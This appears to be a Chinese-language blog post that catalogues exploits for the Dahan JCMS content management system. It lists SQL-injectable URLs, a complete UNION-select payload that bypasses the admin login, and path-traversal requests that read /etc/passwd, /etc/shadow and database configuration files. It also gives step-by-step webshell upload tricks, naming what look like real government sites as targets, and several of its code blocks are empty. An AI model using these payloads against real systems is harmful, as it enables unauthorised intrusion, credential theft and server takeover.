整理一些大汉版通的漏洞

1.sql注入 /vc/vc/interface/index/que_scount.jsp?webid=1 /jcms/short_message/que_contact.jsp?vc_searchname=1 /jcms/short_message/que_recemsg.jsp?que_keywords=1&loginid=a /jcms/workflow/design/que_model.jsp?userid= /jcms/workflow/objectbox/selectx_search.jsp?spell=1 /jcms/workflow/objectbox/selectx_list.jsp?id=1 /jcms/workflow/objectbox/selectx_search.jsp?spell=jcms /jcms/short_message/opr_domsg.jsp?fn=DA&i_id=1&vc_name=a /jcms/workflow/sys/que_dictionary.jsp?que_keywords1=aaa /jcms/m_5_d/opr_wap_col.jsp?strid=122222222&fn_billstatus=D /jcms/m_5_e/init/sitesearch/opr_classajax.jsp?classid=1 /jcms/m_5_5/m_5_5_1/que_flow.jsp?que_keywords1=aaa /jcms/m_5_3/attach/que_attach_choose.jsp?classid=-1&que_keywords1=1 /jcms/workflow/objectbox/selectx_czuserlist.jsp?appid=1&nodecode=3&handlerid=4&flowcode=2 /jcms/m_5_e/module/messagebook/opr_messagebook_column.jsp?fn_billstatus=D&i_ID=1 /jcms/m_5_e/init/download/downfile.jsp?filename=1 /jsearch/objectbox/selectx_search.jsp?spell=jsearch /jphoto/objectbox/selectx_search.jsp?spell=1 /jis/objectbox/selx_userlist.jsp?fn_Keywords=1 /jis/objectbox/selx_search.jsp?spell=jis /jis/objectbox/selx_list.jsp?id=1 /jis/manage/datasbase/closeup.jsp?id=1 /jis/manage/datasbase/startup.jsp?id=1 /xxgk/workflow/objectbox/selectx_list.jsp?id=1 /xxgk/workflow//statistics/que_apply_sta.jsp?userid=0&modelname=1&modelname1=2 /xxgk/short_message/que_recemsg.jsp?que_keywords=1&loginid=1&boxtype=1&que_keywords1=1&que_startdate=1&que_enddate=1 /module/sitesearch/index.jsp?columnid=81 /module/rss/rssfeed.jsp?colid=23 /vipchat/home/front/search/opr_chatsearch.jsp?action=simplesearch&keywords= /zfxxgk/serviceobjectinfo.jsp?servicebm= /zfxxgk/subjectinfo.jsp?subjectbm= 1. 大汉版通JCMS内容管理系统(JCMS2010)默认后台登录页中由于用户名未经处理即带入数据库查询产生SQL注射漏洞。 2. 利用测试: 后台登录页:http://www.target.com/jcms/ 用户名: [php]x' union select '00000','admin','AEY=',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'1',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from dual--[/php] 密码:1 其中'00000'是验证管理员用户组的一个字段;'admin'是管理员用户名;'AEY='加密密码,解密后为'1';后面的'1'表示帐号启用。 2.任意文件读取 /xxgk/jcms_files/jcms1/web1/site/zfxxgk/download/downannals.jsp?name=....//....//zfxxgk/subjectstyle.xml&webid=52&type=41&downname=a.txt /jcms/jcms_files/jcms1/web1/site/module/oss/downfile.jsp?filename=a.txt&pathfile=media/-1/....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//proc/self/environ /vc/vc/columncount/tem/downfile.jsp?filename=/etc/passwd&savename=down.txt /jcms/m_5_7/replace/export.jsp?filename=/etc/shadow&savename=pass /jcms/jcms_files/jcms1/web1/site/module/comment/opr_readfile.jsp?filename=../../../../../../WEB-INF/ini/merpserver.ini /jcms/jcms_files/jcms1/web1/site/module/comment/opr_readfile.jsp?filename=../../../../../../WEB-INF/web.xml /jis/down.jsp?pathfile=web-inf/config/dbconfig.xml /jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig 3.上传getshell漏洞 太多,无法一一列举 1.jcms 将如下代码保存为htm [php]
[/php] Path : /jcms/jcms_files/jcms/web0/site/module/idea/tem/upload/+uploadname 打开便可直接上传任意的文件,文件上传后,路径为: [php] /jcms/jcms_files/jcms/web0/site/module/idea/tem/upload/+你上传的文件名[/php] 2.vc 于是我们构造以下Exp 便可直接获取shell [php]
[/php] 保存为htm 便可直接上传任意文件, 构造zip压缩包,images 文件夹中为我们的shell,default.html 中包含 解压的路径为:/vc/vc/html/upload/shell/images/文件名 3.jcms jcms/setup/opr_upload.jsp 该功能为导入一个zip后缀的更新包...最后会将马解压到目录中update中 /jcms/update 4.xxgk http://xxgk.lyg.gov.cn//xxgk/m_5_e/module/review/opr_review_template.jsp 打开此页面后,直接上传我们的shell.zip,点击提交即可在服务器上解压并生成Customize.jsp /xxgk/jcms_files/jcms1/web0/site/zfxxgk/letterbox/template/-1/Customize.jsp 注:经过多个测试,一般情况都为此路径,极少部分 有可能会更改jcms1 web0后面的数字 5./xxgk/m_6_1/opr_modal.jsp step1 将我们要上传的users.jsp重命名为user.htm step2 上传时抓包,将user.htm再次命名为user.jsp即可 点击GO 即可在下面目录生成user.jsp /xxgk/jcms_files/jcms1/web0/site/zfxxgk/ysqgk/modal/1/你的文件名 注意:由于代码中上传文件的路径为: "/jcms_files/jcms" + strAppID + "/web" + nWebID+ "/site/zfxxgk/ysqgk/modal/" + strModaltype + "/"+ 文件名; 所以路径可能要做适当的更改.@@@ http://xxgk.site.cn/xxgk/jcms_files/jcms1/web0/site/zfxxgk/ysqgk/modal/1/users.jsp 6./xxgk/m_5_7/replace/opr_importinfo.jsp First:首先将我们要上传的文件改名为shell.xml,之后抓包再改回来.. 在验证之前简单说下比较有意思的地方,当我们点击上传的时候,采用Burp suite抓包修改,提交即可 有两处需要修改的地方: Content-Disposition: form-data; name="file1"; filename="shell.xml" Content-Disposition: form-data; name="file3"; filename="shell.jsp" 注意:name必须修改为非file1,要不然无法成功上传(这里就是我觉得比较有意思的地方) 提交后会就会在 /m_5_7/replace/temp/ 目录下生成shell.jsp http://xxgk.weifang.gov.cn/xxgk/m_5_7/replace/opr_importinfo.jsp?fn_billstatus=1 7./xxgk/m_5_5/m_5_5_3/import_style.jsp 我们将xiao.jspx 改名为xiao.xml 上传.. 提交后抓包修改文件名为1.jspx即可 此时已经在 /m_5_5/m_5_5_3/temp/upload/ 目录下生成了xiao.jspx 访问下 成功 /xxgk//m_5_5/m_5_5_3/temp/upload/xiao.jspx 8.截断上传 [php]
[/php] [php]
[/php]

发表评论